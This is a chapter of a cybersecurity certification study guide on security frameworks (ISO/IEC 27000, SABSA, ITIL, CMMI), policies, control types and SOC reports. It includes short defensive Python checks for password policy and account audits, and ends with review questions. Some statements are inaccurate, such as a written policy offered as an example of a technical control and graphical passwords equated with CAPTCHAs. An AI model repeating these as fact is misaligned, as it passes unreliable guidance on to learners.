information security management system (ISMS).
The 27000 Series includes a list of standards, each of which
addresses a particular aspect of ISMS. These standards are
either published or in development. The following standards are
included as part of the ISO/IEC 27000 Series at this writing:
27000: Published overview of ISMS and vocabulary
27001: Published ISMS requirements
27002: Published code of practice for information security controls
27003: Published ISMS implementation guidelines
27004: Published ISMS measurement guidelines
27005: Published information security risk management
guidelines
27006: Published requirements for bodies providing audit and
certification of ISMS
27007: Published ISMS auditing guidelines
27008: Published auditor of ISMS guidelines
27010: Published information security management for inter-sector and inter-organizational communications guidelines
27011: Published telecommunications organizations information
security management guidelines
27013: Published integrated implementation of ISO/IEC 27001
and ISO/IEC 20000-1 guidance
27014: Published information security governance guidelines
27015: Published financial services information security
management guidelines
27016: Information security economics
27017: In-development cloud computing services information
security control guidelines based on ISO/IEC 27002
27018: Published code of practice for protection of personally
identifiable information (PII) in public clouds acting as PII
processors
27019: Published energy industry process control system ISMS
guidelines based on ISO/IEC 27002
27021: Published competence requirements for information
security management systems professionals
27023: Published mapping the revised editions of ISO/IEC 27001
and ISO/IEC 27002
27031: Published information and communication technology
readiness for business continuity guidelines
27032: Published cybersecurity guidelines
27033-1: Published network security overview and concepts
27033-2: Published network security design and implementation
guidelines
27033-3: Published network security threats, design techniques,
and control issues guidelines
27033-4: Published securing communications between networks
using security gateways
27033-5: Published securing communications across networks
using virtual private networks (VPN)
27033-6: In-development securing wireless IP network access
27034-1: Published application security overview and concepts
27034-2: In-development application security organization
normative framework guidelines
27034-3: In-development application security management
process guidelines
27034-4: In-development application security validation
guidelines
27034-5: In-development application security protocols and
controls data structure guidelines
27034-6: In-development security guidance for specific
applications
27034-7: In-development guidance for application security
assurance prediction
27035: Published information security incident management
guidelines
27035-1: In-development information security incident
management principles
27035-2: In-development information security incident response
readiness guidelines
27035-3: In-development computer security incident response
team (CSIRT) operations guidelines
27036-1: Published information security for supplier relationships
overview and concepts
27036-2: Published information security for supplier relationships
common requirements guidelines
27036-3: Published information and communication technology
(ICT) supply chain security guidelines
27036-4: In-development guidelines for security of cloud services
27037: Published digital evidence identification, collection,
acquisition, and preservation guidelines
27038: Published information security digital redaction
specification
27039: Published intrusion detection systems (IDS) selection,
deployment, and operations guidelines
27040: Published storage security guidelines
27041: Published guidance on assuring suitability and adequacy of
incident investigative method
27042: Published digital evidence analysis and interpretation
guidelines
27043: Published incident investigation principles and processes
27044: In-development security information and event
management (SIEM) guidelines
27050: In-development electronic discovery (eDiscovery)
guidelines
27799: Published information security in health organizations
guidelines
These standards are developed by the ISO/IEC bodies, but
certification or conformity assessment is provided by third
parties.
Note
You can find more information regarding ISO standards at https://www.iso.org.
SABSA
SABSA is an enterprise security architecture framework that
uses the six communication questions (What, Where, When,
Why, Who, and How) that intersect with six layers (operational,
component, physical, logical, conceptual, and contextual). It is a
risk-driven architecture. See Table 21-3.
ITIL
ITIL is a process management development standard
originally created by the UK government’s Central Computer and
Telecommunications Agency (CCTA), later the Office of Government
Commerce (OGC), and owned by AXELOS since 2013. ITIL has five
core publications: ITIL Service Strategy, ITIL Service Design,
ITIL Service Transition, ITIL Service Operation, and ITIL
Continual Service Improvement. These five core publications
contain 26 processes. Although ITIL has a security component,
it is primarily concerned with managing the service-level
agreements (SLAs) between an IT department or organization
and its customers. An independent review of security controls
should be performed every three years. Table 21-4 shows the
ITIL v4 key components, ITIL service value system (SVS), and
the four dimensions model.
Maturity Models
Organizations are not alone in the wilderness when it comes to
developing processes for assessing vulnerability, selecting
controls, adjusting security policies and procedures to support
those controls, and performing audits. As described in the
sections that follow, several publications and process models
have been developed to help develop these skills. Maturity
models are used to determine where you are in the continual
improvement process as it relates to security and offer help in
reaching a higher level of improvement.
Table 21-3 SABSA Framework Matrix
Viewpoints/Layer | Assets (What) | Motivation (Why) | Process (How) | People (Who) | Location (Where) | Time (When)
Business / Contextual | Business | Risk model | Process model | Organizations and relationships | Geography | Time dependencies
Architect / Conceptual | Business attributes profile | Control objectives | Security strategies and architectural layering | Security entity model and trust framework | Security domain model | Security-related lifetimes and deadlines
Designer / Logical | Business information model | Security policies | Security services | Entity schema and privilege profiles | Security domain definitions and associations | Security processing cycle
Builder / Physical | Business data model | Security rules, practices, and procedures | Security mechanism | Users, applications, and interfaces | Platform and network infrastructure | Control structure execution
Tradesman / Component | Detailed data structures | Security standards | Security tools and products | Identities, functions, actions, and ACLs | Processes, nodes, addresses, and protocols | Security step timing and sequencing
Facilities manager / Operational | Operational continuity assurance | Operation risk management | Security service management and support | Application and user management and support | Site, network, and platform security | Security operations schedule
Table 21-4 ITIL Version 4 Service Value System
ITIL Service Value Chain | ITIL Practices | ITIL Guiding Principles | Governance | Continual Improvement
Plan | General Management Practices | Focus on value | Directs and controls the organization | Seven step improvement
Engage | Service Management Practices | Start where you are | |
Design and Transition | Technology Management Practices | Progress iteratively with feedback | |
Obtain/Build | | Collaborate and promote visibility | |
Deliver and Support | | Think and work holistically | |
Improve | | Keep it simple and practical | |
 | | Optimize and automate | |
CMMI
The Capability Maturity Model Integration (CMMI) is
a comprehensive set of guidelines that address all phases of the
software development life cycle. It describes a series of stages,
or maturity levels, that a development process can advance
through as it goes from the ad hoc (Initial) model to one that
incorporates a budgeted plan for continuous improvement.
Figure 21-4 shows its five maturity levels.
Figure 21-4 CMMI Maturity Levels
Certification
Although the terms are used as synonyms in casual
conversation, accreditation and certification are two different
concepts in the context of assurance levels and ratings.
However, they are closely related. Certification evaluates the
technical system components, whereas accreditation occurs
when the adequacy of a system’s overall security is accepted by
management.
ISO/IEC 27001
ISO/IEC 27001:2013 is the current version of the 27001
standard, and it is one of the most popular standards by which
organizations obtain certification for information security. It is
covered in Chapter 20.
POLICIES AND PROCEDURES
Policies are broad statements of intent, while procedures are
details used to carry out that intent. Both mechanisms are used
to guide an organization’s effort with regard to security or any
activity over which the organization wishes to gain control. A
security policy should cover certain items, and it should be
composed of a set of documents that ensure that key
components are secured. The following sections cover the key
policies and procedures that should be created and included in a
security policy.
Code of Conduct/Ethics
A code of conduct/ethics policy is one intended to
demonstrate a commitment to ethics in the activities of the
principals. It is typically a broad statement of commitment that
is supported by detailed procedures designed to prevent
unethical activities. For example, the statement might be “We
commit to the highest ethical standards in our dealings with
others.” Supporting this would be a procedure that prohibits the
acceptance or offer of gifts during a sales negotiation.
Personnel hiring procedures should include signing all the
appropriate documents, including government-required
documentation, no expectation of privacy statements, and nondisclosure agreements (NDAs). Organizations usually have a
personnel handbook and other hiring information that must be
communicated to the employee. The hiring process should
include a formal verification that the employee has completed
all the training. Employee IDs and passwords are issued at this
time.
Code of conduct, conflict of interest, and ethics agreements
should also be signed at this time. Also, any non-compete
agreements should be verified to ensure that employees do not
leave the organization for a competitor. Employees should be
given guidelines for periodic performance reviews,
compensation, and recognition of achievements.
Acceptable Use Policy (AUP)
An acceptable use policy (AUP) is used to inform users of
the actions that are allowed and those that are not allowed. It
should also provide information on the consequences that may
result when these policies are violated. This document should
be reviewed and signed by each user during the employee
orientation phase of the employment process. The following are
examples of the many issues that may be addressed in an AUP:
Proprietary information stored on electronic and computing
devices, whether owned or leased by the company, the employee, or a
third party, remains the sole property of the company.
The employee has a responsibility to promptly report the theft, loss,
or unauthorized disclosure of proprietary information.
Access, use, or sharing of proprietary information is allowed only to
the extent that it is authorized and necessary to fulfill assigned job
duties.
Employees are responsible for exercising good judgment regarding
the reasonableness of personal use.
Authorized individuals in the company may monitor equipment,
systems, and network traffic at any time.
The company reserves the right to audit networks and systems on a
periodic basis to ensure compliance with this policy.
All mobile and computing devices that connect to the internal
network must comply with the company access policy.
System-level and user-level passwords must comply with the
password policy.
All computing devices must be secured with a password-protected
screensaver.
Postings by employees from a company e-mail address to
newsgroups should contain a disclaimer stating that the opinions
expressed are strictly their own and not necessarily those of
the company.
Employees must use extreme caution when opening e-mail
attachments received from unknown senders, which may contain
malware.
Password Policy
Password authentication is the most popular authentication
method implemented today. But often password types can vary
from system to system. Before we look at potential password
policies, it is vital that you understand all the types of passwords
that can be used. Some of the types of passwords that you
should be familiar with include the following:
Standard word passwords: As the name implies, these
passwords consist of single words that often include a mixture of
upper- and lowercase letters. The advantage of this password type is
that it is easy to remember. A disadvantage of this password type is
that it is easy for attackers to crack or break, resulting in
compromised accounts.
Combination passwords: These passwords, also called
composition passwords, use a mix of dictionary words, usually two
that are unrelated. Like standard word passwords, they can include
upper- and lowercase letters and numbers. An advantage of this
password type is that it is harder to break than a standard word
password. A disadvantage is that it can be hard to remember.
Static passwords: This password type is the same for each login.
It provides a minimum level of security because the password never
changes. It is most often seen in peer-to-peer networks.
Complex passwords: This password type forces a user to include
a mixture of upper- and lowercase letters, numbers, and special
characters. For many organizations today, this type of password is
enforced as part of the organization’s password policy. An
advantage of this password type is that it is very hard to crack. A
disadvantage is that it is harder to remember and can often be
much harder to enter correctly.
Passphrase passwords: This password type requires that a long
phrase be used. Because of the password’s length, it is easier to
remember but much harder to attack, both of which are definite
advantages. Incorporating upper- and lowercase letters, numbers,
and special characters in this type of password can significantly
increase authentication security.
Cognitive passwords: This password type is a piece of
information that can be used to verify an individual’s identity. The
user provides this information to the system by answering a series
of questions based on her life, such as favorite color, pet’s name,
mother’s maiden name, and so on. An advantage of this type is that
users can usually easily remember this information. The
disadvantage is that someone who has intimate knowledge of the
person’s life (spouse, child, sibling, and so on) may be able to
provide this information as well.
One-time passwords (OTPs): Also called a dynamic password,
an OTP is used only once to log in to the access control system. This
password type provides the highest level of security because it is
discarded after it is used once.
Graphical passwords: Also called CAPTCHA passwords (an
acronym for Completely Automated Public Turing test to tell
Computers and Humans Apart), this type of password uses graphics
as part of the authentication mechanism. One popular
implementation requires a user to enter a series of characters that
appear in a graphic. This implementation ensures that a human, not
a machine, is entering the password. Another popular
implementation requires the user to select the appropriate graphic
for his account from a list of graphics.
Numeric passwords: This type of password includes only
numbers. Keep in mind that the choices of a password are limited
by the number of digits allowed. For example, if all passwords are
four digits, then the maximum number of password possibilities is
10,000, from 0000 through 9999. Once an attacker realizes that
only numbers are used, cracking user passwords is much easier
because the attacker knows the possibilities.
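The keyspace arithmetic behind that warning is easy to verify. This short Python sketch compares four-character numeric-only passwords against passwords drawn from the full mixed character set (the 94-character figure assumes the printable ASCII letters, digits, and symbols):

length = 4
numeric_only = 10 ** length          # digits only: 10,000 possibilities
mixed = 94 ** length                 # 26 + 26 + 10 + 32 printable characters

print(f"Numeric-only keyspace: {numeric_only:,}")
print(f"Mixed-character keyspace: {mixed:,}")   # roughly 78 million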
The simpler types of passwords are considered weaker than
passphrases, one-time passwords, token devices, and login
phrases. Once an organization has decided which type of
password to use, the organization must establish its password
management policies. Password management considerations
include, but may not be limited to, the following:
Password life: How long a password will be valid. For most
organizations, passwords are valid for 60 to 90 days.
Password history: How long before a password can be reused.
Password policies usually remember a certain number of previously
used passwords.
Authentication period: How long a user can remain logged in. If
a user remains logged in for the specified period without activity,
the user will be automatically logged out.
Password complexity: How the password will be structured.
Most organizations require upper- and lowercase letters, numbers,
and special characters. The following are some recommendations
(a short validation sketch appears after this list):
Passwords shouldn’t contain the username or parts of the user’s
full name, such as his first name.
Passwords should use at least three of the four available
character types: lowercase letters, uppercase letters, numbers,
and symbols.
Password length: How long the password must be. Most
organizations require 8 to 12 characters.
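A minimal Python sketch of the complexity recommendations above; the eight-character minimum and three-of-four character-class rule are taken from this list, while the function and variable names are simply illustrative:

import string

def meets_complexity(password, username, min_length=8):
    """Check a password against the recommendations above (a sketch)."""
    if len(password) < min_length:
        return False
    if username.lower() in password.lower():   # must not contain the username
        return False
    classes = [string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation]
    present = sum(any(ch in cls for ch in password) for cls in classes)
    return present >= 3                        # at least three character types

print(meets_complexity("Trout7!run", "jsmith"))   # True
print(meets_complexity("jsmith2021", "jsmith"))   # False (contains username)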
As part of password management, an organization should
establish a procedure for changing passwords. Most
organizations implement a service that allows users to
automatically reset a password before the password expires. In
addition, most organizations should consider establishing a
password reset policy that addresses situations in which users
forget their passwords or their passwords are compromised. A
self-service password reset approach allows users to reset their
own passwords, without the assistance of help desk employees.
An assisted password reset approach requires that users contact
help desk personnel for help changing passwords.
Password reset policies can also be affected by other
organizational policies, such as account lockout policies.
Account lockout policies are security policies that organizations
implement to protect against attacks carried out against
passwords. Organizations often configure account lockout
policies so that user accounts are locked after a certain number
of unsuccessful login attempts. If an account is locked out, the
system administrator may need to unlock or reenable the user
account. Security professionals should also consider
encouraging organizations to require users to reset their
passwords if their accounts have been locked. For most
organizations, all the password policies, including account
lockout policies, are implemented at the enterprise level on the
servers that manage the network.
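A minimal sketch of the lockout logic just described, assuming a threshold of five failed attempts (the actual threshold and reset behavior are set by organizational policy):

from collections import defaultdict

LOCKOUT_THRESHOLD = 5              # assumed policy value
failed_attempts = defaultdict(int)
locked_accounts = set()

def record_failed_login(user):
    """Count a failed login and lock the account at the threshold."""
    failed_attempts[user] += 1
    if failed_attempts[user] >= LOCKOUT_THRESHOLD:
        locked_accounts.add(user)

def record_successful_login(user):
    """A successful login resets the failure counter."""
    failed_attempts[user] = 0

for _ in range(5):
    record_failed_login("jsmith")
print("jsmith" in locked_accounts)   # True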
Depending on which servers are used to manage the enterprise,
security professionals must be aware of the security issues that
affect user accounts and password management. Two popular
server operating systems are Linux and Windows.
For Linux, passwords are stored in the /etc/passwd or
/etc/shadow file. Because the /etc/passwd file is a text file that
can be easily accessed, you should ensure that any Linux servers
use the /etc/shadow file, where the passwords in the file can be
protected using a hash. The root user in Linux is a default
account that is given administrative-level access to the entire
server. If the root account is compromised, all passwords should
be changed. Access to the root account should be limited only to
system administrators, and root login should be allowed only
via a system console.
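One quick way to confirm that a Linux host is actually using shadowed passwords is to verify that the password field in /etc/passwd holds only a placeholder rather than a hash. A minimal Python sketch follows (it must run on the Linux host being checked; /etc/passwd is world-readable, so no special privileges are needed):

def unshadowed_accounts(passwd_path="/etc/passwd"):
    """Return accounts whose password field is not a shadow placeholder."""
    suspicious = []
    with open(passwd_path) as f:
        for line in f:
            fields = line.rstrip("\n").split(":")
            # Field 2 should be "x" (or a lock marker such as "*" or "!")
            # when the real hashes live in /etc/shadow.
            if len(fields) > 1 and fields[1] not in ("x", "*", "!"):
                suspicious.append(fields[0])
    return suspicious

if __name__ == "__main__":
    print(unshadowed_accounts() or "All accounts are shadowed")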
Data Ownership
A data ownership policy is closely related to a data classification
policy (covered in Chapter 13, “The Importance of Proactive
Threat Hunting”), and often the two policies are combined. This
is because typically the data owner is tasked with classifying the
data. Therefore, the data ownership policy covers how the
owner of each piece of data or each data set is identified. In
most cases, the creator of the data is the owner, but some
organizations may deem all data created by a department to be
owned by the department head. Another way a user may
become the owner of data is by bringing into the organization
data that the user did not create. Perhaps the data was
purchased from a third party. In any case, the data ownership
policy should outline both how data ownership occurs and the
responsibilities of the owner with respect to determining the
data classification and identifying those with access to the data.
Data Retention
A data retention policy outlines how various data types must be
retained and may rely on the data classifications described in
the data classification policy. Data retention requirements vary
based on several factors, including data type, data age, and legal
and regulatory requirements. Security professionals must
understand where data is stored and the type of data stored. In
addition, security professionals should provide guidance on
managing and archiving data securely. Therefore, each data
retention policy must be established with the help of
organizational personnel.
A data retention policy usually identifies the purpose of the
policy, the portion of the organization affected by the policy, any
exclusions to the policy, the personnel responsible for
overseeing the policy, the personnel responsible for data
destruction, the data types covered by the policy, and the
retention schedule. Security professionals should work with
data owners to develop the appropriate data retention policy for
each type of data the organization owns. Examples of data types
include, but are not limited to, human resources data, accounts
payable/receivable data, sales data, customer data, and e-mail.
To design a data retention policy, an organization should
answer the following questions:
What are the legal/regulatory requirements and business needs for
the data?
What are the types of data?
What are the retention periods and destruction needs of the data?
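Once those questions are answered, the schedule itself can be captured as data and applied mechanically. In the following Python sketch, the retention periods are invented for illustration; real periods come from the legal, regulatory, and business analysis just described.

from datetime import date, timedelta

# Invented retention periods (in days) for illustration only.
RETENTION_SCHEDULE = {
    "human_resources": 7 * 365,
    "accounts_payable": 7 * 365,
    "email": 3 * 365,
}

def destruction_date(data_type, created):
    """Return the earliest date a record of this type may be destroyed."""
    return created + timedelta(days=RETENTION_SCHEDULE[data_type])

print(destruction_date("email", date(2020, 1, 15)))   # 2023-01-14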
The personnel who are most familiar with each data type should
work with security professionals to determine the data retention
policy. For example, human resources personnel should help
design the data retention policy for all human resources data.
While designing a data retention policy, the organization must
consider the media and hardware that will be used to retain the
data. Then, with this information in hand, the data retention
policy should be drafted and formally adopted by the
organization and/or business unit.
Once a data retention policy has been created, personnel must
be trained to comply with it. Auditing and monitoring should be
configured to ensure data retention policy compliance.
Periodically, data owners and processors should review the data
retention policy to determine whether any changes need to be
made. All data retention policies, implementation plans,
training, and auditing should be fully documented.
Remember that for most organizations, a one-size-fits-all
solution is impossible because of the different types of data.
Only those most familiar with each data type can determine the
best retention policy for that data. While a security professional
should be involved in the design of the data retention policies,
the security professional is there to ensure that data security is
always considered and that data retention policies satisfy
organizational needs. The security professional should only act
in an advisory role and should provide expertise when needed.
Account Management
The account management policy helps guide the management of
identities and accounts. Identity and account management is
vital to any authentication process. As a security professional,
you must ensure that your organization has a formal procedure
to control the creation and allocation of access credentials or
identities. If invalid accounts are allowed to be created and are
not disabled, security breaches will occur. Most organizations
implement a method to review the identification and
authentication process to ensure that user accounts are current.
Answering questions such as the following is likely to help in the
process:
Is a current list of authorized users and their access maintained and
approved?
Are passwords changed at least every 90 days—or earlier, if needed?
Are inactive user accounts disabled after a specified period of time?
Any identity management procedure must include processes for
creating (provisioning), changing and monitoring (reviewing),
and removing users from the access control system (revoking).
This is referred to as the access control provisioning life cycle.
When initially establishing a user account, new users should be
required to provide valid photo identification and should sign a
statement regarding password confidentiality. User accounts
must be unique. Policies should be in place to standardize the
structure of user accounts. For example, all user accounts
should be firstname.lastname or some other structure. This
ensures that users in an organization will be able to determine a
new user’s identification, mainly for communication purposes.
After creation, user accounts should be monitored to ensure
that they remain active. Inactive accounts should be
automatically disabled after a certain period of inactivity, based
on business requirements. In addition, any termination policy
should include formal procedures to ensure that all user
accounts are disabled or deleted. Elements of proper account
management include the following:
Establish a formal process for establishing, issuing, and closing user
accounts.
Periodically review user accounts.
Implement a process for tracking access authorization.
Periodically rescreen personnel in sensitive positions.
Periodically verify the legitimacy of user accounts.
User account reviews are a vital part of account management.
User accounts should be reviewed for conformity with the
principle of least privilege. This principle specifies that users
should only be given the rights and permission required to do
their job and no more. User account reviews can be performed
on an enterprisewide, systemwide, or application-by-application basis. The size of the organization greatly affects
which of these methods to use. As part of user account reviews,
organizations should determine whether all user accounts are
active.
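The inactive-account portion of a review lends itself to automation. The following is a minimal Python sketch, assuming last-login timestamps can be pulled from the directory service and that policy sets a 90-day inactivity window (both are assumptions, not prescriptions):

from datetime import datetime, timedelta

INACTIVITY_WINDOW = timedelta(days=90)   # assumed policy value

# Placeholder data; in practice this comes from the directory service.
last_logins = {
    "jsmith": datetime(2021, 1, 5),
    "mjones": datetime(2021, 6, 20),
}

def accounts_to_disable(now):
    """Return accounts whose last login falls outside the window."""
    return [user for user, seen in last_logins.items()
            if now - seen > INACTIVITY_WINDOW]

print(accounts_to_disable(datetime(2021, 7, 1)))   # ['jsmith']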
Continuous Monitoring
To support the enforcement of a security policy and its various
parts, operations procedures should be defined and practiced on
a daily basis. One of the most common operational procedures
that should be defined is continuous monitoring. Before
continuous monitoring can be successful, an organization must
ensure that operational baselines are captured. After all, an
organization cannot recognize abnormal patterns or behavior if
it doesn’t know what “normal” is. These baselines should also be
revisited periodically to ensure that they have not changed. For
example, if a single web server is upgraded to a web server farm,
a new performance baseline should be captured.
Security analysts must ensure that the organization’s security
posture is maintained at all times. This requires continuous
monitoring. Auditing and security logs should be reviewed on a
regular schedule. Performance metrics should be compared to
baselines. Even simple acts such as normal user login/logout
times should be monitored. If a user suddenly starts logging in
and out at irregular times, the user’s supervisor should be
alerted to ensure that the user is authorized. Organizations
must always be diligent in monitoring the security of the
enterprise.
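In its simplest form, monitoring against a baseline is just flagging metrics that drift beyond a tolerance. The metric names, baseline values, and 20 percent tolerance in this Python sketch are invented for illustration:

# Invented baseline and current metrics for illustration.
baseline = {"cpu_percent": 35.0, "logins_per_hour": 120.0}
current = {"cpu_percent": 36.2, "logins_per_hour": 310.0}
TOLERANCE = 0.20   # flag anything more than 20% above baseline

for metric, base in baseline.items():
    observed = current[metric]
    if observed > base * (1 + TOLERANCE):
        print(f"ALERT: {metric} at {observed} exceeds baseline {base}")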
An example of a continuous monitoring tool is the Microsoft
Security Compliance Toolkit (SCT). This tool can be used to monitor
compliance with a baseline. It works with two other Microsoft
tools: Group Policy and Microsoft Endpoint Configuration
Manager (MECM).
Work Product Retention
Work product is anything you complete for a person or business
that has hired you. Organizations need a clear work product
retention policy that defines all work product as property of
the organization and not of the worker who created the product.
This requires employees to sign an agreement to that effect at
time of employment.
CATEGORY
Control categories refer to how the control responds to the
issue, while the control type refers to how the control is
implemented. There are three control categories: managerial (or
administrative), operational, and technical. Control types are
covered in the following “Control Type” section.
Managerial
Managerial controls (also called administrative controls)
are implemented to administer the organization’s assets and
personnel and include security policies, procedures, standards,
baselines, and guidelines that are established by management.
These controls are commonly referred to as soft controls.
Specific examples are personnel controls, data classification,
data labeling, security awareness training, and supervision.
Security awareness training is a very important administrative
control. Its purpose is to improve the organization’s attitude
about safeguarding data. The benefits of security awareness
training include reduction in the number and severity of errors
and omissions, better understanding of information value, and
better administrator recognition of unauthorized intrusion
attempts. A cost-effective way to ensure that employees take
security awareness seriously is to create an award or recognition
program.
Operational
Operational controls are measures that are made part of the
organizational security stance day to day. These controls include
the following control types:
Directive controls: Specify acceptable practice within an
organization. They are in place to formalize an organization’s
security directive mainly to its employees. The most popular
directive control is an acceptable use policy (AUP), which lists
proper (and often examples of improper) procedures and behaviors
that personnel must follow. Any organizational security policies or
procedures usually fall into this access control category. You should
keep in mind that directive controls are efficient only if there is a
stated consequence for not following the organization’s directions.
Deterrent controls: Deter or discourage an attacker. Via
deterrent controls, attacks can be discovered early in the process.
Deterrent controls often trigger preventive and corrective controls.
Examples of deterrent controls include user identification and
authentication, fences, lighting, and organizational security policies,
such as an NDA.
Technical
Technical controls (also called logical controls) are software
or hardware components used to restrict access. Specific
examples of logical controls are firewalls, IDSs, IPSs,
encryption, authentication systems, protocols, auditing and
monitoring, biometrics, smart cards, and passwords.
An example of implementing a technical control is adopting a
new security policy that forbids employees from remotely
configuring the e-mail server from a third party’s location
during work hours.
Although auditing and monitoring are logical controls and are
often listed together, they are actually two different controls.
Auditing is a one-time or periodic event to evaluate security.
Monitoring is an ongoing activity that examines either the
system or users.
CONTROL TYPE
Controls are implemented as countermeasures to identified
vulnerabilities. Control mechanisms are divided into six types,
as explained in this section. Control type refers to how the
control is implemented.
Preventative
Preventative controls (or preventive controls) prevent an
attack from occurring. Examples of preventive controls include
locks, badges, biometric systems, encryption, IPSs, antivirus
software, personnel security, security guards, passwords, and
security awareness training.
Detective
Detective controls are in place to detect an attack while it is
occurring to alert appropriate personnel. Examples of detective
controls include motion detectors, IDSs, logs, guards,
investigations, and job rotation.
Corrective
Corrective controls are in place to reduce the effect of an
attack or other undesirable event. Using corrective controls
fixes or restores the entity that is attacked. Examples of
corrective controls include installing fire extinguishers, isolating
or terminating a connection, implementing new firewall rules,
and using server images to restore to a previous state.
Deterrent
Deterrent controls deter or discourage an attacker. Via deterrent controls,
attacks can be discovered early in the process. Deterrent
controls often trigger preventive and corrective controls.
Examples of deterrent controls include user identification and
authentication, fences, lighting, and organizational security
policies, such as an NDA.
Directive
Directive controls specify acceptable practice within an organization. They are in
place to formalize an organization’s security directive mainly to
its employees. The most popular directive control is an
acceptable use policy (AUP), which lists proper (and often
examples of improper) procedures and behaviors that personnel
must follow. Any organizational security policies or procedures
usually fall into this access control category. You should keep in
mind that directive controls are efficient only if there is a stated
consequence for not following the organization’s directions.
Physical
Physical controls are implemented to protect an
organization’s facilities and personnel. Personnel concerns
should take priority over all other concerns. Specific examples
of physical controls include perimeter security, badges, swipe
cards, guards, dogs, mantraps, biometrics, and cabling.
AUDITS AND ASSESSMENTS
Assessing vulnerability, selecting controls, and adjusting
security policies and procedures to support those controls
without performing verification and quality control are
somewhat like driving without a dashboard. Just as you would
have no information about the engine temperature, speed, and
fuel level, you would be unable to determine whether your
efforts are effective.
Audits differ from internal assessments in that they are usually
best performed by a third party. An organization should
conduct internal and third-party audits as part of any security
assessment and testing strategy. An audit should test all
security controls that are currently in place. Some guidelines to
consider as part of a good security audit plan include the
following:
At minimum, perform annual audits to establish a security baseline.
Determine your organization’s objectives for the audit and share
them with the auditors.
Set the ground rules for the audit before the audit starts, including
the dates/times of the audit.
Choose auditors who have security experience.
Involve business unit managers early in the process.
Ensure that auditors rely on experience, not just checklists.
Ensure that the auditor’s report reflects risks that your organization
has identified.
Ensure that the audit is conducted properly.
Ensure that the audit covers all systems and all policies and
procedures.
Examine the report when the audit is complete.
Audits and assessments can fall into two categories, which are
covered in the following sections.
Regulatory
Many regulations today require that audits occur. Organizations
used to rely on Statement on Auditing Standards (SAS) 70,
which provided auditors information and verification about
data center controls and processes related to the data center
user and financial reporting. In 2011, the Statement on
Standards for Attestation Engagements (SSAE) No. 16 took the
place of SAS 70 as the authoritative standard for auditing
service organizations and was subsequently updated to version
18. These audits verify that the controls and processes set in
place by a data center are actually followed. The Statement on
Standards for Attestation Engagements (SSAE) 18 is a standard
that verifies the controls and processes and also requires a
written assertion regarding the design and operating
effectiveness of the controls being reviewed.
An SSAE 18 audit results in a Service Organization Control
(SOC) 1 report. This report focuses on internal controls over
financial reporting. There are two types of SOC 1 reports:
SOC 1, Type 1 report: Focuses on the auditors’ opinion of the
accuracy and completeness of the data center management’s design
of controls, system, and/or service.
SOC 1, Type 2 report: Includes Type 1 and an audit on the
effectiveness of controls over a certain time period, normally
between six months and a year.
Two other report types are also available: SOC 2 and SOC 3.
Both of these audits provide benchmarks for controls related to
the security, availability, processing integrity, confidentiality, or
privacy of a system and its information. A SOC 2 report includes
service auditor testing and results, and a SOC 3 report provides
only the system description and auditor opinion. A SOC 3 report
is for general use and provides a level of certification for data
center operators that assures data center users of facility
security, high availability, and process integrity. Table 21-5
briefly compares the three types of SOC reports. Included in the
table are two new report types as well.
Table 21-5 SOC Report Comparison Chart
Report Type | What It Reports On | Who Uses It
SOC 1 | Internal controls over financial reporting | User auditors and users’ controller office
SOC 2 | Security, availability, processing integrity, confidentiality, or privacy controls | Management, regulators, and others; shared under nondisclosure agreement (NDA)
SOC 3 | Security, availability, processing integrity, confidentiality, or privacy controls | Publicly available to anyone
SOC for Cybersecurity | An organization’s efforts to prevent, monitor, and effectively handle any cybersecurity threats | Management and practitioners
SOC Consulting & Readiness | The controls it currently has in place, while also preparing it for the actual execution of a SOC report | Management and practitioners
Compliance
No organization operates within a bubble. All organizations are
affected by laws, regulations, and compliance requirements.
Security analysts must understand the laws and regulations of
the country or countries they are working in and the industry
within which they operate. In many cases, laws and regulations
prescribe how specific actions must be taken. In other cases,
laws and regulations leave it up to the organization to determine
how to comply. Significant pieces of legislation that can affect
an organization and its security policy are covered in Chapter
19.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 21-6
lists a reference of these key topics and the page numbers on
which each is found.
Table 21-6 Key Topics in Chapter 21
Key Topic Element | Description | Page Number
Table 21-2 | NIST SP 800-53 Rev 4 control families | 552
Bulleted list | TOGAF domains | 554
Figure 21-2 | TOGAF ADM model | 554
Bulleted list | NIST Cybersecurity Framework | 555
Bulleted list | The ISO/IEC 27000 Series | 556
Table 21-3 | SABSA framework matrix | 560
Table 21-4 | ITIL v4 service value system | 561
Figure 21-4 | CMMI maturity levels | 562
Bulleted list | Issues that may be addressed in an AUP | 563
Bulleted list | Password types | 564
Bulleted list | Password management policies | 566
Section | Control types | 571
Table 21-5 | SOC report comparison chart | 574
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
frameworks
NIST SP 800-53
COBIT
The Open Group Architecture Framework (TOGAF)
NIST Cybersecurity Framework version 1.1
ISO/IEC 27000 Series
SABSA
ITIL
maturity models
Capability Maturity Model Integration (CMMI)
certification
accreditation
National Information Assurance Certification and
Accreditation Process (NIACAP)
ISO/IEC 27001:2013
code of conduct/ethics
acceptable use policy (AUP)
standard word passwords
combination passwords
static passwords
complex passwords
passphrase passwords
cognitive passwords
one-time passwords (OTPs)
graphical passwords
numeric passwords
password life
password history
authentication period
password complexity
password length
work product retention
managerial (administrative type) controls
operational controls
directive controls
deterrent controls
technical controls
physical controls
preventative controls
detective controls
corrective controls
SOC 1 Type 1 report
SOC 1 Type 2 report
REVIEW QUESTIONS
1. ________________ is a security controls development
framework developed by NIST.
2. List the family and class of at least two of the NIST SP 800-53 control families.
3. Match the following terms with their definitions.
Terms | Definitions
Code of conduct/ethics | Divides the controls into three classes: technical, operational, and management
Acceptable use policy | Work done for and owned by the organization
Work product retention | Describes what can be done by users
NIST SP 800-53 | Details standards of business conduct
4. List at least two guidelines to consider as part of a good
security audit plan.
5. List at least one SOC report, including what it reports on
and who uses it.
6. Match the following terms with their definitions.
Terms | Definitions
Control Objectives for Information and Related Technology (COBIT) | Focuses exclusively on IT security
The Open Group Architecture Framework (TOGAF) | An enterprise architecture framework that helps organizations design, plan, implement, and govern an enterprise information architecture
NIST Cybersecurity Framework | A security program development standard on how to develop and maintain an information security management system (ISMS)
ISO/IEC 27000 Series | Security controls development framework that uses a process model to subdivide IT into four domains
7. _______________________ controls are software or
hardware components used to restrict access.
8. List and define at least two password policies.
